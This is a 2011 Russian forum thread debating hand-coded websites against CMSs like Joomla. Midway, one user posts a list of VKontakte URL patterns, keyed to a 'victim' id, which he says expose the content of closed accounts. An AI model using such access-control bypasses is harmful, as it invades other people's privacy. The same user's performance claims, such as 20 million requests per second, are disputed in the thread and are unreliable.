[ Поиск ] - [ Пользователи ] - [ Календарь ]
Полная Версия: Рукописный сайт vs готовые CMS
dukman
Уважаемые команда IRBIS-team и профессионалы в сфере web.

Довольно продолжительное время я изучал различные веб технологи, и с недавнего времени начал применять их на практике, но на моем пути встала Joomla, а именно люди использующие её.... Ведь создание сайтов при использовании Joomlа дешевле и гораздо меньше затрачиваешь времени на это.

Хотел бы услышать мнение профессионалов. В чем преимущество рукописных сайтов перед CMS типа Joomla? Как вы относитесь к использованию CMS Joomla и их подобных?

Я задаю эти вопросы ибо потенциальные заказчики отказываются от предлагаемых мною услуг в пользу Joomla, ведь это дешево и быстро.... А я не знаю что ответить на выше заданные вопросы sad.gif

Помогите пожалуйста



Спустя 21 минута, 12 секунд (21.01.2011 - 19:14) Invis1ble написал(а):
dukman
у меня пока нет опыта работы с Joomla, но насколько я знаю по отзывам, основные ее (и ей подобным) минусы - это большое потребление ресурсов и невозможность решать нетривиальные задачи.

Спустя 14 минут, 27 секунд (21.01.2011 - 19:28) inpost написал(а):
dukman
А ты хочешь работать на сайты-визитки или сложные проекты суммой по 10-000 и 20-000 долларов? Если сайты-визитки, то конечно же Joomla =)

Спустя 15 минут, 16 секунд (21.01.2011 - 19:43) dukman написал(а):
Вот именно хочу работать над сложными проектами smile.gif но для начало надо бы учиться с боле простых проектов:) и вот он вроде выплюнулся, но заказчики предпочли боле дешевую джомлу, а я не смог аргументировать в чем преимущество Рукописных сайтов от шаблонных типа джомлы sad.gif

Спустя 1 минута, 47 секунд (21.01.2011 - 19:45) DedMorozzz написал(а):
Joomla очень мощное и функциональное решение, с возможностями расширения, обновления и прочее прочее. Сколько человеко-часов было на её разработку затрачено, что аж смысла сравнивать нету, как такового, если сложнее сайта визитки. Ибо чем сложнее сайт, тем лучше себя покажет ЦМС. До некого предела, она не свемогуща.
Цитата
В чем преимущество рукописных сайтов перед CMS типа Joomla? Как вы относитесь к использованию CMS Joomla и их подобных?

Я задаю эти вопросы ибо потенциальные заказчики отказываются от предлагаемых мною услуг в пользу Joomla, ведь это дешево и быстро.... А я не знаю что ответить на выше заданные вопросы sad.gif

Преимущество рукописных - то что ничего лишнего и если качественный, хороший, годный код - то и быстрее(в смысле скорость работы кода).
ЗЫ: джумла, сама по себе не настолько и медленная.
Как отношусь к ЦМСкам? Аля Друпал, ВП, Джумла - отлично. Хорошие решения. Сайты построенные на них очень хорошо защищены, существенно лучше любых рукописных, ибо безопасность - отдельное место подтачивоемое годами.
Так же управление. То же самое, реализованно очень понятно и просто. Функционала причём настолько много, что создать в ручную такой же - уйдут долгие годы. А тут - сразу "искаропки" готовое. А клиенту - это важно. Ибо он будет работать с админкой.

Спустя 1 час, 37 минут, 28 секунд (21.01.2011 - 21:23) Arni написал(а):
Хотелось бы дополнить DedMorozzz.

Все начинается с ТЗ. Если вы вы четко знаете что должно получиться то вы сможете ответить подойдет ли вам джумла или нет. Я в свое время очень сильно разуверился в джумле и ей подобным. А все потому что нету универсального решения, и слава Богу не будет ,ибо программисты останутся без работы. wink.gif

На базе джумлы можно решить огромное множество задач, но далеко не все. Да и админка там становится понятной и удобной не спервого знакомства. Про друпал я молчу, может меня и заклюют но в админке друпала без пол-литры нечего и делать.

Что касается разработки своей системы, то вы в любом случае не ошибетесь если сделаете это и выпустите хотябы одну версию. Потом уже не важно, вы либо все бросите и оцените по достоинству труд разработчиков джумлы, либо будете бороться за свою точку зрения. И если она действительно стоящая, то вы обязательно найдете единомышленников. А также, вы в любом случае получите очень ценный опыт, в первую очередь для себя. А это важно.

Спустя 13 минут, 51 секунда (21.01.2011 - 21:36) twin написал(а):
Вот все правы.
Только один момент. Если ты хочешь научится делать сайты, то это оно. То, что нужно.

Если хочешь стать программистом, то думай сам. Ни кто и никогда не научит этому.

Только сам. Головой и руками.

Спустя 6 минут, 34 секунды (21.01.2011 - 21:43) dukman написал(а):
Спасибо за ответы!

Спустя 11 часов, 45 минут (22.01.2011 - 09:28) Michael написал(а):
Цитата (twin @ 21.01.2011 - 20:36)
Вот все правы.
Только один момент. Если ты хочешь научится делать сайты, то это оно. То, что нужно.
Если хочешь стать программистом, то думай сам. Ни кто и никогда не научит этому.

А программистом для чего хотеть становиться? Для того чтобы сайты делать, денюжку зарабатывать. Круг замкнулся.

dukman , если в твоем городе есть фирмы, где создают сайты. Например за бугор. То лучше поузнавай с чем они работают. Может оказаться с одним из php-фреймворков. И для тебя с ним разобраться может быть перспективней чем с цмс. В фреймворке просто кодинг - программисту привычное. А в цмс типа джумла, друпал - интерфейсы для того чтобы сайты щелчками мышкой создавать. Много в "левом"(идеалогии, модулях, приемах работы ...) разбираться, а программировать под них - своя абракадабра.

Спустя 2 часа, 9 минут, 53 секунды (22.01.2011 - 11:38) twin написал(а):
Цитата
А программистом для чего хотеть становиться? Для того чтобы сайты делать, денюжку зарабатывать. Круг замкнулся.
Совсем не обязательно сайты. Можно делать те же джумлы к примеру.

Спустя 9 минут, 43 секунды (22.01.2011 - 11:48) Michael написал(а):
Цитата (twin @ 22.01.2011 - 10:38)
Цитата
А программистом для чего хотеть становиться? Для того чтобы сайты делать, денюжку зарабатывать. Круг замкнулся.
Совсем не обязательно сайты. Можно делать те же джумлы к примеру.

а что людям нужно много джумол? Им бы в одной разобраться. smile.gif . В общем то это удел фирм(1С и д.р.) или сообществ у бесплатных .... А не одиночки программиста.

Спустя 9 минут, 52 секунды (22.01.2011 - 11:57) twin написал(а):
Не, на самом деле все не так. Я вот к примеру два года работаю программистом в одной фирме, при этом не делаю сайтов и тем более не юзаю всяких джумлов. У нас свой проект, рукописный разумеется. И он постоянно совершенствуется и развивается.
Так что вот. Сайты клепать на джумлах у нас уметь не обязательно. А вот программистом быть надо.

Спустя 8 минут, 36 секунд (22.01.2011 - 12:06) Michael написал(а):
twin, ну это понятно. Ты же на фирме работаешь, вы свой движок толкаете. Если ТС найдет себе такую фирму, где только пыху знать достаточно - значит повезет.

Спустя 13 минут, 18 секунд (22.01.2011 - 12:19) twin написал(а):
Тут не столько везение нужно, сколько желание. Вот к примеру учатся люди на водителя. Получают права. А потом идут работать. Один таксистом на легковушку, другой дальнобойщиком на камаз. Как тут сказать, что кому-то повезло. Каждый выбрал свой путь.

Я потому и говорю. Если собираешься посветить свою жизнь разработке сайтов на продажу, то там важен вал. И лучше пользоваться инструментами наверное. Фреймворками или CMS.

А если хочешь быть специалистом, то есть тру-программистом, то нужно учиться писать руками.

Спустя 9 часов, 53 минуты, 57 секунд (22.01.2011 - 22:13) Воитель написал(а):
А сколько времени примерно уходит на освоение Joomla ?
Если учесть что изначально в голове о php не пусто.

Спустя 1 минута, 34 секунды (22.01.2011 - 22:15) DmitryOpalev написал(а):
У меня знакомый ничего не знает о PHP smile.gif
Что-то делает

Спустя 2 часа, 36 минут, 54 секунды (23.01.2011 - 00:52) glock18 написал(а):
Крутая безопасность и бесплатный движок типа жумлы - несовместимые вещи. Каждый такой проект распространяемый с открытым исходным кодом на руках у всех, и все дыры там известны всему миру. Да, дыры закрывать пытаются, но не все и не сразу. Поэтому думать, что готовое решение дает лучшую безопасность неверно - хотя конечно, если сам не можешь обеспечить нужный уровень, то заявление "безопасность в жумле круче" можно считать верным. с поправкой на то, с чем собственно сравнение то делается wink.gif

Спустя 37 минут, 53 секунды (23.01.2011 - 01:30) DedMorozzz написал(а):
glock18, та ну перестань. Громкое заявление =) Взломай сайт на джумле 1.5.22 к примеру.

Спустя 1 час, 44 минуты, 7 секунд (23.01.2011 - 03:14) Админ написал(а):
скажу как человек, который сам ранее кричал что будущее за цмс - сейчас скажу так - если бы я делал сайт для себя я никогда бы не использовал цмс - я расковырял джумлу вдоль и поперёк - вещь конечно грамотная - но своя рубашка ближе - самый главный аргумент - время генерации страницы (что бы там не кричали про некую мифическую оптимизацию мышиные "програмисты") - аффигенно чуется при использовании различных беспроводных модемов - юзер иной раз в крестик тыкнет чем ждать пока джумла весь свой хлам загрузит, про глюки при пристыковки модулей вообще молчу, про постоянно обновляющийся список уязвимостей тоже упоминать не буду.

Спустя 5 часов, 2 минуты, 15 секунд (23.01.2011 - 08:16) twin написал(а):
DedMorozzz
Цитата
Взломай сайт на джумле 1.5.22 к примеру.
У меня у знакомой поломали. И какую то турецкую ересь повешали туда. Так что...

Спустя 5 часов, 11 минут, 53 секунды (23.01.2011 - 13:28) Arni написал(а):
Цитата (twin @ 23.01.2011 - 05:16)
DedMorozzz
Цитата
Взломай сайт на джумле 1.5.22 к примеру.
У меня у знакомой поломали. И какую то турецкую ересь повешали туда. Так что...

Откуда вывод что был атакован именно скрипт джумлы? Может это была еще одна жертва дыры в proftpd? Очень много сайтов пострадало буквально недавно. Относительно самой джумлы,то не такая она уж и дыра. Намного больше (слухи) дыр в модулях к ней. Реально чем меня джумла и подобные ей ЦМС не устраивают так это да, уже говорили. Много букв в коде.

Например взять модуль меню. Все знают о том что там есть переключение, генерировать меню можна ul, div, <tr> <td>. Целый файл, который инклюдится кстати, занимается тем что смотрит настройку, и запускает блок кода который гинерирует меню так как это укажет пользователь. Не,ну разве не розкошь? Ну и зачем это? Конечно, чтоб ликвидировать надобность разработчикам колупать принадлежащий джумле код. И у них это разве получилось?

Отзовитесь те кто поставил сайт на джумле и ничего не затронул в коде джумлы!

Не ну если сайт делали себе то может и будут такие. Я про тех кто делал реальный заказ, и клиент голову заворачивал с сделай тут то там се. НЕ-ПО-ЛУ-ЧИТ-СО! Гы, а это не есть гуд.

Спустя 1 час, 7 минут, 57 секунд (23.01.2011 - 14:36) twin написал(а):
Цитата
Откуда вывод что был атакован именно скрипт джумлы?

Дело в том, что она просила меня кое-что дописать на сайт. Я не стал разбираться с джумлой и писать компонент. А написал просто свой самостоятельный модуль.
Тобишь получилось, что сайт состоит из двух систем - джумлы и моей. Так вот джумла погибла, а мои скрипты (кстати, которые отвечали за основной функционал), остались не тронутыми. Отсюда и вывод.

Спустя 6 минут, 38 секунд (23.01.2011 - 14:43) Basili4 написал(а):
ИМХО дырявость ЦМС это от дырявости модулей. пишут их все кому не лень. И тыкают куда не попадя.

Спустя 2 часа, 33 минуты, 51 секунда (23.01.2011 - 17:16) d4a1 написал(а):
Поидее Joomla должна генерить страницу быстрее чем php за счет mvc.
mvc - рулит.
В joomla 1.5 только один косяк с дублями страниц, при стандартном seo .
т.е можно мильон разных ссылок сделать одной страницы. ,
чем конечно могут воспользоваться конкуренты - могут за это и сайт забанить в ПС.
Надеюсь в 1.6 такого не будет.

Спустя 24 минуты, 7 секунд (23.01.2011 - 17:40) inpost написал(а):
За счёт MVC? То есть такой быдло код на ПХП в строчку, как пишу я будет медленее, чем разбитие на несколько файлов + инклюды постоянно? Ну уж нет =)

Спустя 28 минут, 6 секунд (23.01.2011 - 18:09) d4a1 написал(а):
цитата:
Фактически Фреймворк Joomla дает нам язык более высшего уровня, чем сам php.

Я имел ввиду , если движок будет самописный из нескольких php файлов, то скорость генерации страницы в Joomla будет выше за счет MVC (Model-View-Controller)

Спустя 4 часа, 36 минут, 27 секунд (23.01.2011 - 22:45) DedMorozzz написал(а):
d4a1
откуда такая информация? smile.gif чистая пыха по скорости наиболее быстрая.

Спустя 1 час, 41 секунда (23.01.2011 - 23:46) d4a1 написал(а):
Цитата (DedMorozzz @ 23.01.2011 - 19:45)
d4a1
чистая пыха по скорости наиболее быстрая.


в большом движке - не факт.
ссылку не помню - доказали чистая пыха - медленнее.

Спустя 14 минут, 44 секунды (24.01.2011 - 00:00) inpost написал(а):
d4a1
Знаешь в чём твоя ошибка? Ты не знаешь, что такое Joomla, а уж тем более MVC. Я, например, скажу что мега-гипер двигатель самый быстрый. Докажите обратное не попробовав его?! =)
И, между прочим, не Попов, случайно, говорил о том, что Joomla самая быстрая? smile.gif

Спустя 1 минута, 32 секунды (24.01.2011 - 00:02) jumper_dev написал(а):
d4a1
Ошибочная информация... =)

Спустя 3 минуты, 25 секунд (24.01.2011 - 00:05) d4a1 написал(а):
Я поповым не общаюсь.

Jomla 1/5 движок практически идеален, за некоторыми исключениями.
дыр практически 0.
Какой смысл писать свой движок? Ведь получится всеравно дырявый, или не функциональный.
Я видел сайты на самописных Дорогих движках - очень не впечатляет.
и Цмс JoOmla- не грузит лишний код. Это вы зря.
А реализовать можно всё. Делаеш шаблон - ну и т.д.
И зачем изобретать "дырявый" велик.

Спустя 1 минута, 38 секунд (24.01.2011 - 00:07) inpost написал(а):
Может из-за того, что Google & фейсбук не пользуются джоомлой? Или тот же ebay, webmoney, хабра, вики, баш?
Назови хотя бы один элитный сайт за миллион, который был написан на джоомле?

Спустя 1 минута, 26 секунд (24.01.2011 - 00:08) d4a1 написал(а):
майкрософт вроде на бесплатной

Спустя 4 минуты, 50 секунд (24.01.2011 - 00:13) inpost написал(а):
d4a1
http://2ip.ru/cms/?url=microsoft.com - смотри и грызи ногти.

Спустя 2 минуты, 6 секунд (24.01.2011 - 00:15) d4a1 написал(а):
ты чего такой злой ?

inpost
да ты впринците прав. Но иногда надо использовать цмс. Чтоб моск не компостировать

Спустя 3 минуты, 48 секунд (24.01.2011 - 00:19) inpost написал(а):
d4a1
Они хороши только для сайтов-визиток или других мелочей. А злой, потому что ты "мало знаешь", но "высоко задираешь нос" и пытаешься доказать, а не слушаешь советы экспертов (таких как DedMorozzz).

Спустя 2 минуты, 41 секунда (24.01.2011 - 00:22) d4a1 написал(а):
НУ да визитки..
Легко можно соц.сеть сделать и будет круче и функциональнее , чем долбаный Контакт

Спустя 4 минуты, 44 секунды (24.01.2011 - 00:27) inpost написал(а):
d4a1
прекрасный анекдот, расскажи ещё =)

Спустя 3 минуты, 50 секунд (24.01.2011 - 00:30) d4a1 написал(а):
серьёзно так оно и есть. без шуток

Спустя 5 минут, 43 секунды (24.01.2011 - 00:36) d4a1 написал(а):
В контакте , чего очень защище :н

способ просмотра закрытых страниц аккаунтов Вконтакте.


Вместо хххххх – id жертвы!!!!

http://vkontakte.ru/video.php?id=хххххх – открыть видео пользователя

http://vkontakte.ru/wall.php?id=хххххх – открыть сообщения на стене пользователя.

http://vkontakte.ru/notes.php?id=хххххх – открыть заметки пользователя

http://vkontakte.ru/apps.php?mid=хххххх – открыть приложения закрытого аккаунта

http://vkontakte.ru/groups.php?id=хххххх – группы закрытого аккаунта

http://vkontakte.ru/audio.php?id=хххххх – музыкальные композиции аккаунта

http://vkontakte.ru/gifts.php?id=хххххх – подарки пользователя

http://vkontakte.ru/photos.php?act=user&id=хххххх – фотографии где был отмечен пользователь.

http://vkontakte.ru/questions.php?mid=хххххх – вопросы закрытого пользователя
Открываем альбомы с фотографиями закрытого пользователя:

Все что нам для этого нужно так это вставить в адресную строку вместо слова id - слово – albums без пробелов и других знаков. В итоге строка должна выглядеть так:

http://vkontakte.ru/albums1234567
И еще один адресок, но это для друзей вконтакте.

Если вы хотите быстро оставить мнение о ком то, но у вас список друзей огромный и лень искать то тогда вот ссылка:

http://vkontakte.ru/opinions.php?id=ххххххх – всесто ххх – вставляете id пользователя, которому хотите отослать мнение.

Спустя 20 минут, 15 секунд (24.01.2011 - 00:56) inpost написал(а):
d4a1
А ты не думаешь, что это сделано специально для пауков?

Спустя 2 часа, 1 минута, 53 секунды (24.01.2011 - 02:58) d4a1 написал(а):
НУ А ЦМСка выдаст 404 .
и не для пауков это - а страшный косяк.

Спустя 20 минут, 27 секунд (24.01.2011 - 03:19) sixpoundeeer написал(а):
Цитата
и не для пауков это - а страшный косяк.

Наивный. Для чего это не было б сделано, разработчики знают об этом 99,9%.

Цитата
НУ А ЦМСка выдаст 404 .

ЦМСка с открытым исходным кодом выдаст то, что ты в нее заложишь.

Спустя 10 часов, 3 минуты, 52 секунды (24.01.2011 - 13:23) DedMorozzz написал(а):
inpost, опять несколько не прав! smile.gif
Цитата
Они хороши только для сайтов-визиток или других мелочей
наоборот, для визитки ЦМС не лучшее решение. Конечно если нагрузка и избыточность кода в 97% не важана.
ЦМС нужна там, где будет задействована бОльшая часть функционала и это никак не мелочные проекты.
А вот КАКАЯ ЦМС и подойдёт ли она вообще зависит от проекта.
Не зря существуют кроме Джумлы достаточно других хороших и мощных ЦМСок.
Всё они ориентируются на свой спектр задач.

Спустя 11 минут, 50 секунд (24.01.2011 - 13:34) VELIK505 написал(а):
За 5 дней можно всю насквозь прошупать если не пусто в голове

Спустя 31 минута, 21 секунда (24.01.2011 - 14:06) DedMorozzz написал(а):
VELIK505, ух не верю smile.gif Необходимо что бы было не "не пусто" в голове, а что бы был опыт работы с другими ЦМСками.
Если конечно речь идёт не о простом нажимании на клавиши. А именно "прощупать". Т.е. в случ чего дописать кусок, которого не хватает

Спустя 9 минут, 55 секунд (24.01.2011 - 14:16) glock18 написал(а):
Цитата
Язык более высокого


d4a1

как раз не означает, что он работает быстрее. Хоть бы понимал, что означает высказывание "язык высокого уровня" или язык низкого". в большинстве случаев зависимость будет обратной, и язык более высокого уровня будет иметь меньшее быстродействие.

чушь короче, можешь так же чуть погодя доказать мне, что пхп быстрее ассемблера (ну а если даже пхп быстрее, то жумла то сделает ассемблер на счет "раз").

Спустя 2 часа, 56 минут, 47 секунд (24.01.2011 - 17:13) inpost написал(а):
DedMorozzz
Если у сайта посещаемость маленькая, то сайт мелкий и подходит джоомлы. А вот крупные, где по 3000-5000 он-лайн, постоянно вижу как падают. С ручным оптимизированным движком было бы эфективнее для сайта и легче бы жил, не падал бы. А сайту-визитке пофиг, как по мне, что загрузится он за 1,5 секунды, что за 2.

Спустя 27 минут, 38 секунд (24.01.2011 - 17:40) Michael написал(а):
вот ссылка:
http://www.sostav.ru/columns/tv/47732ebad1...f02707b8a83af4/
как раз по теме - точка зрения Заказчика.

Спустя 51 минута, 2 секунды (24.01.2011 - 18:31) Dron19 написал(а):
а джумлу что не люди писали? Почему вы так говорите, рукописный сайт и джумла. Джумла тоже людьми написана... и если он хороший программист, то создаст не более дырявую защиту. Но тут уже да,дело времени...

Спустя 1 минута, 4 секунды (24.01.2011 - 18:32) inpost написал(а):
Michael
О чём там? Можешь в двух словах рассказать?

Спустя 25 минут, 1 секунда (24.01.2011 - 18:57) d4a1 написал(а):
inpost
joomla легко выдержит 20 000 000 запросов в сек.
весь вопрос в сервере. так что ненадо

Спустя 21 минута, 31 секунда (24.01.2011 - 19:19) twin написал(а):
Цитата
О чём там? Можешь в двух словах рассказать?

Банальая реклама какой то CMS на уровне гербалайфа. Хочешь самый крутой сайт в мире - спроси у меня как. biggrin.gif

Спустя 10 минут, 48 секунд (24.01.2011 - 19:30) DedMorozzz написал(а):
после того, что 27 мин идёт видео, ясно что это не "сайт глазами заказчика", а реклама всех достоинств какой-то системы.
Ибо сайт глазами заказчика - это 3 минуты

Спустя 13 часов, 31 минута, 6 секунд (25.01.2011 - 09:01) Michael написал(а):
Не, там вначале недолго надо посмотреть - ведущий высказывает претензии к самопису (и даже студийному), о своих проблемах - озвучивает "чего бы ему хотелось от сайта". А отвечающий толкает мысль в массы, что программисты уже и не нужны - можно и без них на CMS, без нервотрепки.

Потом там да - реклама, меня не убедила кстати.

Спустя 32 минуты, 49 секунд (25.01.2011 - 09:33) sergeiss написал(а):
Цитата (d4a1 @ 24.01.2011 - 19:57)
joomla легко выдержит 20 000 000 запросов в сек.

СКОКА-СКОКА???? У тебя там кнопка с ноликом не залипла? wink.gif

Спустя 48 минут, 32 секунды (25.01.2011 - 10:22) Arni написал(а):
Цитата (d4a1 @ 24.01.2011 - 15:57)
inpost
joomla легко выдержит 20 000 000 запросов в сек.
весь вопрос в сервере. так что ненадо

Лучше бы вы этого не писали. Я напрочь разуверился в вашей компетенции. Вы поинтересуйтесь сколько в nix* подобных ОС по умолчанию открытых сокетов, прежде чем публиковать такие цифры.

Спустя 13 минут, 22 секунды (25.01.2011 - 10:35) Basili4 написал(а):
Arni
ну это по умолчанию.... А если сервер под настроить. Хотя не верю я 20 мега запросов.

эти запросы ИМХО не то что джумлу и сам сервак завалят.

Спустя 5 минут, 54 секунды (25.01.2011 - 10:41) Michael написал(а):
да это он чисто для примера привел "от балды" цифру. Понятно что все упирается в железо. Просто для движков - они много дополнительной работы делают, модульность она не бесплатна. Запросов к базе хватает. Как тут у джумлы?
Например на локалке у меня сейчас друпал стоит, по модулям - самое необходимое.
На главной: 5 анонсов статей и 6 блоков по бокам. Друпал делает 257 запросов.

Где то теряем, где то выигрываем cool.gif


Спустя 6 минут, 36 секунд (25.01.2011 - 10:48) Arni написал(а):
Цитата (Basili4 @ 25.01.2011 - 07:35)
Arni
ну это по умолчанию.... А если сервер под настроить. Хотя не верю я 20 мега запросов.

эти запросы ИМХО не то что джумлу и сам сервак завалят.

Ну и сколько сокетов для под настройки мы дополнительно откроем? wink.gif 20 000 000 ?

Гы-гы

Спустя 4 часа, 57 минут, 1 секунда (25.01.2011 - 15:45) Гость_User написал(а):
Не хочу никого обидеть, но...
Что-то местные эскперты начали "мететь бисер перед свиньями", не кажется.
Кому и что вы доказываете?

Цитата
Легко можно соц.сеть сделать и будет круче и функциональнее , чем долбаный Контакт


Видимо про Joomla сказано.

Я не профессионал, но после этого вы всерьез вопринимаете автора темы... )

Спустя 4 минуты, 57 секунд (25.01.2011 - 15:50) Michael написал(а):
мы тут уже больше между собой общаемся и, да, мы всех воспринимаем всерьез.

Спустя 2 минуты, 24 секунды (25.01.2011 - 15:52) Гость_User написал(а):
Понял.
Тогда не вмешиваюсь...

Спустя 2 минуты, 15 секунд (25.01.2011 - 15:55) Snus написал(а):
Много повидал "Писунов соц. сетей", однако все до сих пор пользуются сервисами ВКо#$%кте и Одно#$%&сники (не на правах рекламы). Продолжайте дальше думать, что ваш проект будет самым посещаемым и лучшим. smile.gif

Спустя 2 часа, 43 минуты, 12 секунд (25.01.2011 - 18:38) d4a1 написал(а):
вот например такая сеть . это только образец.

http://www.jomsocial.com/community.html

но ещё круче будет на Community Builder
можно сделать на самом деле очень большой функционал. Ну и естественно свой дизайн.

Joomla.org - примерно 1 000 000 пользователей в сутки. И ничего не падало.

пс. я соц.сеть делать не собирался.

Спустя 16 минут, 48 секунд (25.01.2011 - 18:55) twin написал(а):
ужос((
Быстрый ответ:

 Графические смайлики |  Показывать подпись
Здесь расположена полная версия этой страницы.
Invision Power Board © 2001-2024 Invision Power Services, Inc.